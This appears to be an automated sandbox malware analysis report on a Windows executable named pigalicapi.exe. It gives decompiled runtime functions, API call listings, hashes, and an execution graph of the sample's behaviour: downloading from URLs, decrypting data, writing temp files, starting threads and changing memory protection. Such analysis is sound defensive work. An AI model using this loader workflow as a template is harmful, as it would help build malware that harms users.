                                                                                                                                                                                                                                                    0x00f0102b
                                                                                                                                                                                                                                                    0x00f01030
                                                                                                                                                                                                                                                    0x00f01037
                                                                                                                                                                                                                                                    0x00f0103e
                                                                                                                                                                                                                                                    0x00f01050
                                                                                                                                                                                                                                                    0x00f01057
                                                                                                                                                                                                                                                    0x00f01076
                                                                                                                                                                                                                                                    0x00f01082
                                                                                                                                                                                                                                                    0x00f0109d
                                                                                                                                                                                                                                                    0x00f010a0
                                                                                                                                                                                                                                                    0x00f010a7
                                                                                                                                                                                                                                                    0x00f010ad
                                                                                                                                                                                                                                                    0x00f010b4
                                                                                                                                                                                                                                                    0x00f010b7
                                                                                                                                                                                                                                                    0x00f010b9
                                                                                                                                                                                                                                                    0x00f010bd
                                                                                                                                                                                                                                                    0x00f010c7
                                                                                                                                                                                                                                                    0x00f010c7
                                                                                                                                                                                                                                                    0x00f010c9
                                                                                                                                                                                                                                                    0x00f010cf
                                                                                                                                                                                                                                                    0x00f010d2
                                                                                                                                                                                                                                                    0x00f010d4
                                                                                                                                                                                                                                                    0x00f010da
                                                                                                                                                                                                                                                    0x00f010db
                                                                                                                                                                                                                                                    0x00f010e1
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00f010bf
                                                                                                                                                                                                                                                    0x00f010bf
                                                                                                                                                                                                                                                    0x00f010bf
                                                                                                                                                                                                                                                    0x00f010c2
                                                                                                                                                                                                                                                    0x00f010c3
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00f010bf
                                                                                                                                                                                                                                                    0x00f010af
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00f010af
                                                                                                                                                                                                                                                    0x00f01088
                                                                                                                                                                                                                                                    0x00f0108d
                                                                                                                                                                                                                                                    0x00f0108f
                                                                                                                                                                                                                                                    0x00f01091
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00f01059
                                                                                                                                                                                                                                                    0x00f01059
                                                                                                                                                                                                                                                    0x00f0105e
                                                                                                                                                                                                                                                    0x00f01060
                                                                                                                                                                                                                                                    0x00f01061
                                                                                                                                                                                                                                                    0x00f01096
                                                                                                                                                                                                                                                    0x00f01096
                                                                                                                                                                                                                                                    0x00f010e4
                                                                                                                                                                                                                                                    0x00f010e5
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00f010ee
                                                                                                                                                                                                                                                    0x00f00fea
                                                                                                                                                                                                                                                    0x00f00fea
                                                                                                                                                                                                                                                    0x00f00ff1
                                                                                                                                                                                                                                                    0x00f00ff2
                                                                                                                                                                                                                                                    0x00f00ff4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00f00ff9

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000104), ref: 00F01010
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F010DB
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F010E5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                    • API String ID: 2506810119-1494416116
                                                                                                                                                                                                                                                    • Opcode ID: edf07075be7b48cde3e06722be40b4d6a42f8e291edc194db377556f8da8c09f
                                                                                                                                                                                                                                                    • Instruction ID: a127f7ec1639fbbdfbb2508675be013489f490c0b3c827d60f9cf0493f30e336
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: edf07075be7b48cde3e06722be40b4d6a42f8e291edc194db377556f8da8c09f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4319D71E04248EBCB21DF99DC819AEBBFCFB85360F148066E944D7251D6708E80FB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                                    			E00EFA7B0(signed int _a4) {
                                                                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                                                                    				WCHAR* _t22;
                                                                                                                                                                                                                                                    				signed int _t24;
                                                                                                                                                                                                                                                    				signed int* _t25;
                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t9 = _a4;
                                                                                                                                                                                                                                                    				_t25 = 0xf8df50 + _t9 * 4;
                                                                                                                                                                                                                                                    				_t24 =  *_t25;
                                                                                                                                                                                                                                                    				if(_t24 == 0) {
                                                                                                                                                                                                                                                    					_t22 =  *(0xf46c50 + _t9 * 4);
                                                                                                                                                                                                                                                    					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                                                                                                                                                                                                                    					if(_t27 != 0) {
                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                    						 *_t25 = _t27;
                                                                                                                                                                                                                                                    						if( *_t25 != 0) {
                                                                                                                                                                                                                                                    							FreeLibrary(_t27);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t13 = _t27;
                                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                                    						return _t13;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t15 = GetLastError();
                                                                                                                                                                                                                                                    					if(_t15 != 0x57) {
                                                                                                                                                                                                                                                    						_t27 = 0;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                                                                                                                                                                                                                    						_t27 = _t15;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_t27 != 0) {
                                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						 *_t25 = _t15 | 0xffffffff;
                                                                                                                                                                                                                                                    						_t13 = 0;
                                                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t4 = _t24 + 1; // 0x3af7f1ed
                                                                                                                                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                                                                                                                                    				return  ~_t4 & _t24;
                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                    0x00efa7b5
                                                                                                                                                                                                                                                    0x00efa7b9
                                                                                                                                                                                                                                                    0x00efa7c0
                                                                                                                                                                                                                                                    0x00efa7c4
                                                                                                                                                                                                                                                    0x00efa7d2
                                                                                                                                                                                                                                                    0x00efa7e8
                                                                                                                                                                                                                                                    0x00efa7ec
                                                                                                                                                                                                                                                    0x00efa815
                                                                                                                                                                                                                                                    0x00efa817
                                                                                                                                                                                                                                                    0x00efa81b
                                                                                                                                                                                                                                                    0x00efa81e
                                                                                                                                                                                                                                                    0x00efa81e
                                                                                                                                                                                                                                                    0x00efa824
                                                                                                                                                                                                                                                    0x00efa826
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efa827
                                                                                                                                                                                                                                                    0x00efa7ee
                                                                                                                                                                                                                                                    0x00efa7f7
                                                                                                                                                                                                                                                    0x00efa806
                                                                                                                                                                                                                                                    0x00efa7f9
                                                                                                                                                                                                                                                    0x00efa7fc
                                                                                                                                                                                                                                                    0x00efa802
                                                                                                                                                                                                                                                    0x00efa802
                                                                                                                                                                                                                                                    0x00efa80a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efa80c
                                                                                                                                                                                                                                                    0x00efa80f
                                                                                                                                                                                                                                                    0x00efa811
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efa811
                                                                                                                                                                                                                                                    0x00efa80a
                                                                                                                                                                                                                                                    0x00efa7c6
                                                                                                                                                                                                                                                    0x00efa7cb
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00EFA757,?,00000000,00000000,00000000,?,00EFA954,00000006,FlsSetValue), ref: 00EFA7E2
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00EFA757,?,00000000,00000000,00000000,?,00EFA954,00000006,FlsSetValue,00F471D0,FlsSetValue,00000000,00000364,?,00EF9D02), ref: 00EFA7EE
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00EFA757,?,00000000,00000000,00000000,?,00EFA954,00000006,FlsSetValue,00F471D0,FlsSetValue,00000000), ref: 00EFA7FC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                                                                    • Opcode ID: 93ad4cda7371d0c09c26395581e458acf3524cb724710ee25c5ba79f16ee88c7
                                                                                                                                                                                                                                                    • Instruction ID: e65981dbf0c1ddaa10b7d39e3368ad9f930dd048d53a1ff9e3306f98b1f2bc1e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93ad4cda7371d0c09c26395581e458acf3524cb724710ee25c5ba79f16ee88c7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E801247261526EAFC7244B389C489B67798EF057E1B284130EB0EEB140E7A0D80196E1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00EFF89A
                                                                                                                                                                                                                                                      • Part of subcall function 00EFFEDF: ___AdjustPointer.LIBCMT ref: 00EFFF29
                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00EFF8B1
                                                                                                                                                                                                                                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 00EFF8C3
                                                                                                                                                                                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00EFF8E7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2633735394-0
                                                                                                                                                                                                                                                    • Opcode ID: a0c907a298b97105730ea91cdf1af8e9e208b30165c122e71212370a16017045
                                                                                                                                                                                                                                                    • Instruction ID: 1c490c380b5a06e15db90c5997b2906cabfad56d19c52ddbd3ad030e45774bfa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a0c907a298b97105730ea91cdf1af8e9e208b30165c122e71212370a16017045
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4101133200014DBBCF12AF55CC01EEA3BAAEF89754F159424FA1876121C772E8A1EBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EFF376() {
                                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				E00F007C7();
                                                                                                                                                                                                                                                    				E00F0075B();
                                                                                                                                                                                                                                                    				if(E00F0049E() != 0) {
                                                                                                                                                                                                                                                    					_t4 = E00EFF4B6(_t8, __eflags);
                                                                                                                                                                                                                                                    					__eflags = _t4;
                                                                                                                                                                                                                                                    					if(_t4 != 0) {
                                                                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						E00F004DA();
                                                                                                                                                                                                                                                    						goto L1;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                    0x00eff376
                                                                                                                                                                                                                                                    0x00eff37b
                                                                                                                                                                                                                                                    0x00eff387
                                                                                                                                                                                                                                                    0x00eff38c
                                                                                                                                                                                                                                                    0x00eff391
                                                                                                                                                                                                                                                    0x00eff393
                                                                                                                                                                                                                                                    0x00eff39e
                                                                                                                                                                                                                                                    0x00eff395
                                                                                                                                                                                                                                                    0x00eff395
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00eff395
                                                                                                                                                                                                                                                    0x00eff389
                                                                                                                                                                                                                                                    0x00eff389
                                                                                                                                                                                                                                                    0x00eff38b
                                                                                                                                                                                                                                                    0x00eff38b

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00EFF376
                                                                                                                                                                                                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00EFF37B
                                                                                                                                                                                                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00EFF380
                                                                                                                                                                                                                                                      • Part of subcall function 00F0049E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00F004AF
                                                                                                                                                                                                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00EFF395
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1761009282-0
                                                                                                                                                                                                                                                    • Opcode ID: d9d358f762020a3697c42513d329f3b7714901d0df1c8398228c41b5068d958c
                                                                                                                                                                                                                                                    • Instruction ID: a42740d55204b70f9740e38ba8be7bdc69912250cfb90e5be96165c5f8ef3eef
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d9d358f762020a3697c42513d329f3b7714901d0df1c8398228c41b5068d958c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CC04C1A006249909F60BAB129127FE23410C66BC9F8034E1EB50B74C79D4D150AB977
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:22.4%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:99.6%
                                                                                                                                                                                                                                                    Signature Coverage:24.1%
                                                                                                                                                                                                                                                    Total number of Nodes:1233
                                                                                                                                                                                                                                                    Total number of Limit Nodes:19
                                                                                                                                                                                                                                                    execution_graph 5691 e426a4 5692 e426b8 5691->5692 5693 e42c01 RtlAllocateHeap 5692->5693 5696 e42731 5692->5696 5694 e426d4 5693->5694 5695 e42b8a RtlAllocateHeap 5694->5695 5694->5696 5695->5696 5697 ec4cad 5698 ec4cb6 5697->5698 5700 ec4cc3 5698->5700 5702 ec52a2 5698->5702 5699 ec8370 24 API calls 5701 ec5344 5699->5701 5705 ec4e2c 5700->5705 5706 ec4db7 GetCurrentThreadId 5700->5706 5726 ec4ce5 5700->5726 5703 ec56b8 VirtualFree VirtualFree VirtualFree 5701->5703 5704 ec5354 lstrlenA lstrlenA 5701->5704 5702->5699 5707 ec56eb CoUninitialize 5703->5707 5704->5703 5708 ec5385 wsprintfA CryptBinaryToStringA 5704->5708 5711 ec4ee1 5705->5711 5712 ec4e81 GetSystemMetrics GetSystemMetrics 5705->5712 5705->5726 5706->5726 5708->5703 5710 ec53d0 MultiByteToWideChar 5708->5710 5713 ec17d0 16 API calls 5710->5713 5715 ec4f40 5711->5715 5716 ec4ef0 GlobalMemoryStatus 5711->5716 5712->5726 5714 ec543e 5713->5714 5717 ec569b 5714->5717 5719 ec551b 5714->5719 5720 ec547d VirtualFree 5714->5720 5721 ec4fdf lstrlenA 5715->5721 5722 ec5032 5715->5722 5715->5726 5716->5726 5717->5703 5718 ec56a4 VirtualFree 5717->5718 5718->5703 5719->5717 5725 ec552c EnterCriticalSection 5719->5725 5739 ec54b1 5720->5739 5721->5726 5723 ec5096 5722->5723 5724 ec5041 lstrlenA 5722->5724 5727 ec5104 5723->5727 5728 ec50a5 lstrlenA 5723->5728 5724->5726 5729 ec558c VirtualAlloc 5725->5729 5730 ec5542 VirtualAlloc 5725->5730 5732 ec5172 5727->5732 5733 ec5113 lstrlenA 5727->5733 5728->5726 5734 ec568e LeaveCriticalSection 5729->5734 5735 ec55c7 GetTickCount 5729->5735 5731 ec5578 5730->5731 5731->5734 5737 ec51e0 5732->5737 5738 ec5181 lstrlenA 5732->5738 5733->5726 5734->5717 5742 ec55da 5735->5742 5736 ec17d0 16 API calls 5736->5739 5740 ec523f 5737->5740 5741 ec51ef lstrlenA 5737->5741 5738->5726 5739->5719 5739->5736 5740->5726 5743 ec9b90 QueryPerformanceCounter 5740->5743 5741->5726 5744 ec565c VirtualFree 5742->5744 5743->5726 5744->5734 5415 ec7865 5416 ec788f VirtualFree 5415->5416 5418 ec97c0 2 API calls 5416->5418 5419 ec78ba CoUninitialize 5418->5419 5421 ec78c3 5419->5421 5422 ec2f60 5425 ec3090 GetPEB 5422->5425 5424 ec2f72 5425->5424 5745 ec6da0 5746 ec723f 5745->5746 5747 ec6db9 Sleep CoInitialize 5745->5747 5748 ec6e1b 5747->5748 5749 ec7017 GetEnvironmentVariableA 5747->5749 5750 ec6e3f VirtualAlloc 5748->5750 5751 ec6ee5 5748->5751 5752 ec703e 5749->5752 5758 ec6ee3 5750->5758 5760 ec6e6e 5750->5760 5753 ec2070 32 API calls 5751->5753 5754 ec9730 QueryPerformanceCounter 5752->5754 5753->5758 5755 ec704f GetTickCount GetTempFileNameA CreateFileA 5754->5755 5756 ec70ac 5755->5756 5757 ec7239 CoUninitialize 5755->5757 5762 ec718b WriteFile 5756->5762 5763 ec70db VirtualAlloc 5756->5763 5757->5746 5759 ec6f21 5758->5759 5764 ec73c0 5 API calls 5758->5764 5779 ec700f 5758->5779 5765 ec6ff6 5759->5765 5788 ec97a0 GetProcessHeap RtlAllocateHeap 5759->5788 5761 ec6ed2 VirtualFree 5760->5761 5766 ec2070 32 API calls 5760->5766 5761->5758 5771 ec71b5 CloseHandle 5762->5771 5769 ec7189 5763->5769 5770 ec7116 5763->5770 5764->5759 5774 ec2510 8 API calls 5765->5774 5765->5779 5768 ec6e97 5766->5768 5768->5761 5773 ec6ea8 VirtualAlloc 5768->5773 5769->5771 5780 ec713f WriteFile 5770->5780 5781 ec7175 VirtualFree 5770->5781 5771->5757 5775 ec71cb 5771->5775 5772 ec6f3a 5776 ec6f6a VirtualAlloc 5772->5776 5777 ec6f57 5772->5777 5778 ec6ecf 5773->5778 5774->5779 5775->5757 5782 ec1e60 2 API calls 5775->5782 5776->5777 5777->5765 5784 ec6fbd CreateThread CloseHandle 5777->5784 5778->5761 5779->5757 5780->5781 5781->5769 5783 ec71e5 5782->5783 5783->5757 5785 ec7217 5783->5785 5786 ec73c0 5 API calls 5783->5786 5784->5765 5785->5757 5787 ec2510 8 API calls 5785->5787 5786->5785 5787->5779 5788->5772 5426 ec3fff WSACleanup CoUninitialize 5427 ec400a ExitProcess 5426->5427 5789 ec3936 5791 ec393f 5789->5791 5790 ec35e0 16 API calls 5790->5791 5791->5790 5792 ec39fa VirtualQuery 5791->5792 5793 ec3a50 5791->5793 5794 ec3a1d VirtualProtect 5791->5794 5792->5791 5794->5791 5428 ec8cf0 5429 ec8e1a 5428->5429 5430 ec8d07 5428->5430 5430->5429 5431 ec8d25 CryptAcquireContextA 5430->5431 5432 ec8d7e 5431->5432 5433 ec8d49 GetLastError 5431->5433 5432->5429 5436 ec8d88 CryptCreateHash 5432->5436 5434 ec8d5b 5433->5434 5435 ec8d64 CryptAcquireContextA 5433->5435 5434->5432 5434->5435 5435->5432 5437 ec8e0e CryptReleaseContext 5436->5437 5438 ec8da3 CryptHashData 5436->5438 5437->5429 5439 ec8dbb CryptDeriveKey 5438->5439 5440 ec8e04 CryptDestroyHash 5438->5440 5439->5440 5441 ec8ddf CryptDecrypt CryptDestroyKey 5439->5441 5440->5437 5441->5440 5442 ec38f0 5445 ec3909 5442->5445 5443 ec3a50 5445->5443 5446 ec39fa VirtualQuery 5445->5446 5447 ec3a1d VirtualProtect 5445->5447 5448 ec35e0 GetModuleHandleA 5445->5448 5446->5445 5447->5445 5449 ec38da 5448->5449 5450 ec3607 5448->5450 5449->5445 5451 ec361a GetModuleFileNameA 5450->5451 5451->5449 5452 ec363b CreateFileA 5451->5452 5452->5449 5453 ec366a GetFileSize 5452->5453 5454 ec368c VirtualAlloc 5453->5454 5455 ec38cd CloseHandle 5453->5455 5454->5455 5456 ec36b5 ReadFile 5454->5456 5455->5449 5467 ec3370 5456->5467 5462 ec384d 5464 ec35e0 3 API calls 5462->5464 5466 ec3872 VirtualFree VirtualFree 5462->5466 5463 ec3738 5463->5462 5465 ec37f4 lstrcpynA lstrcatA lstrcpyA 5463->5465 5463->5466 5464->5466 5465->5462 5466->5455 5468 ec337f 5467->5468 5469 ec339e VirtualAlloc 5468->5469 5470 ec3397 5468->5470 5469->5470 5472 ec33ca 5469->5472 5473 ec3580 5470->5473 5471 ec3494 VirtualFree 5471->5470 5472->5470 5472->5471 5474 ec3592 lstrlenA 5473->5474 5475 ec3596 5473->5475 5474->5463 5474->5466 5475->5474 5477 ec34b0 5475->5477 5479 ec34c3 5477->5479 5480 ec34bc 5477->5480 5478 ec3518 lstrcmpA 5478->5479 5478->5480 5479->5478 5479->5480 5480->5474 5481 ec2af0 5482 ec2df2 5481->5482 5483 ec2b0f 5481->5483 5483->5482 5484 ec2b4e InternetQueryOptionA InternetSetOptionA 5483->5484 5485 ec2b99 InternetOpenUrlA 5483->5485 5484->5485 5486 ec2dda GetLastError 5485->5486 5487 ec2bc3 5485->5487 5486->5482 5488 ec2be0 HttpQueryInfoA 5487->5488 5489 ec2dce InternetCloseHandle 5488->5489 5490 ec2c16 5488->5490 5489->5482 5490->5489 5491 ec2c3b VirtualAlloc 5490->5491 5491->5489 5492 ec2c61 5491->5492 5493 ec2c81 InternetReadFile 5492->5493 5494 ec2ca6 5492->5494 5493->5492 5493->5494 5495 ec2d10 HttpQueryInfoA 5494->5495 5496 ec2d3f lstrcmpiA 5495->5496 5497 ec2d55 5495->5497 5496->5497 5498 ec2dba VirtualFree 5497->5498 5498->5489 5499 ec4bf0 5500 ec4bf9 5499->5500 5501 ec56f0 CoUninitialize 5500->5501 5502 ec4c28 VirtualAlloc VirtualAlloc VirtualAlloc 5500->5502 5503 ec4c10 WaitForSingleObject 5500->5503 5504 ec4c23 5502->5504 5505 ec4c8a 5502->5505 5503->5502 5503->5504 5504->5501 5505->5504 5507 ec4cc3 5505->5507 5509 ec52a2 5505->5509 5506 ec8370 24 API calls 5508 ec5344 5506->5508 5510 ec4ce5 5507->5510 5513 ec4e2c 5507->5513 5514 ec4db7 GetCurrentThreadId 5507->5514 5511 ec56b8 VirtualFree VirtualFree VirtualFree 5508->5511 5512 ec5354 lstrlenA lstrlenA 5508->5512 5509->5506 5511->5504 5512->5511 5515 ec5385 wsprintfA CryptBinaryToStringA 5512->5515 5513->5510 5517 ec4ee1 5513->5517 5518 ec4e81 GetSystemMetrics GetSystemMetrics 5513->5518 5514->5510 5515->5511 5516 ec53d0 MultiByteToWideChar 5515->5516 5519 ec17d0 16 API calls 5516->5519 5520 ec4ef0 GlobalMemoryStatus 5517->5520 5523 ec4f40 5517->5523 5518->5510 5524 ec543e 5519->5524 5520->5510 5521 ec569b 5521->5511 5522 ec56a4 VirtualFree 5521->5522 5522->5511 5523->5510 5527 ec4fdf lstrlenA 5523->5527 5528 ec5032 5523->5528 5524->5521 5525 ec551b 5524->5525 5526 ec547d VirtualFree 5524->5526 5525->5521 5532 ec552c EnterCriticalSection 5525->5532 5531 ec54b1 5526->5531 5527->5510 5529 ec5096 5528->5529 5530 ec5041 lstrlenA 5528->5530 5533 ec5104 5529->5533 5534 ec50a5 lstrlenA 5529->5534 5530->5510 5531->5525 5542 ec17d0 16 API calls 5531->5542 5535 ec558c VirtualAlloc 5532->5535 5536 ec5542 VirtualAlloc 5532->5536 5538 ec5172 5533->5538 5539 ec5113 lstrlenA 5533->5539 5534->5510 5540 ec568e LeaveCriticalSection 5535->5540 5541 ec55c7 GetTickCount 5535->5541 5537 ec5578 5536->5537 5537->5540 5543 ec51e0 5538->5543 5544 ec5181 lstrlenA 5538->5544 5539->5510 5540->5521 5548 ec55da 5541->5548 5542->5531 5545 ec523f 5543->5545 5546 ec51ef lstrlenA 5543->5546 5544->5510 5545->5510 5547 ec9b90 QueryPerformanceCounter 5545->5547 5546->5510 5547->5510 5549 ec565c VirtualFree 5548->5549 5549->5540 5795 ec8e30 CreateEventA CreateThread WaitForSingleObject 5796 ec5db0 5797 ec7d20 5796->5797 5798 ec5dcc lstrcpyA 5797->5798 5799 ec1e60 2 API calls 5798->5799 5800 ec5ded 5799->5800 5801 ec1f30 5802 ec203f 5801->5802 5803 ec1f50 VirtualAlloc 5801->5803 5804 ec1f97 VirtualAlloc 5803->5804 5805 ec1fad 